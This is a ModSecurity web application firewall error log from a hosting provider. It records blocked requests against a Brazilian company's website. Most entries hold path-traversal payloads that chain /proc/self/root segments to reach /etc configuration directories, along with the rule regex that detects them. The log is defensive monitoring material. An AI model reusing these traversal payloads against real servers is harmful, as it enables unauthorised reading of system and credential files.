[Mon Mar 16 09:21:34.166952 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:37872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1ztSswJuvopo3lOhMCAAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:21:34.803169 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:45434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1zglT9VtDQc7bgUyWkgAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:21:36.147272 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:45442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf10HjZBu2q05ozVU9BuAAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:21:54.307946 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.243.203:45446] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf14nbQATo66fKoS7w30wAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:01.671340 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:33294] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf16QlT9VtDQc7bgUyWmwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:08.922614 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:35984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf18Jqj1wV0Si-OkefUwgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:14.376141 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.243.203:40766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf19rysWC90G-1nBrAxEgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:15.940083 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:40768] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf19wlT9VtDQc7bgUyWoQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:35.428580 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:40772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2CZqj1wV0Si-OkefU6gAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:37.805060 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:43078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2DQlT9VtDQc7bgUyWrQAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:39.115043 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.243.203:43082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2DwlT9VtDQc7bgUyWsAAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:50.134385 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:57678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2GnjZBu2q05ozVU9B1AAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:52.565645 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.243.203:44340] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2HLABkC4fWIHEf8HWigAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:22:59.560293 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:44348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2IxXjF1vJNtV6CWrkuQAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:23:02.011265 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.243.203:36110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2JnjZBu2q05ozVU9B3QAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:23:05.883996 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.244.31:56384] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf2KdSswJuvopo3lOhMHQAAAIU"]
[Mon Mar 16 09:23:18.592482 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:36116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2M7ABkC4fWIHEf8HWrQAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:23:28.110384 2026] [:error] [pid 10709:tid 140411557287680] [client 74.7.243.203:33348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2QBXjF1vJNtV6CWrkzwAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:23:32.628813 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.243.203:38962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2RBXjF1vJNtV6CWrk0gAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:23:33.907275 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:45170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2RXbQATo66fKoS7w38AAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:23:35.369157 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.243.203:45186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2R3bQATo66fKoS7w39QAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:23:37.920831 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.243.203:45200] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2SRXjF1vJNtV6CWrk3QAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
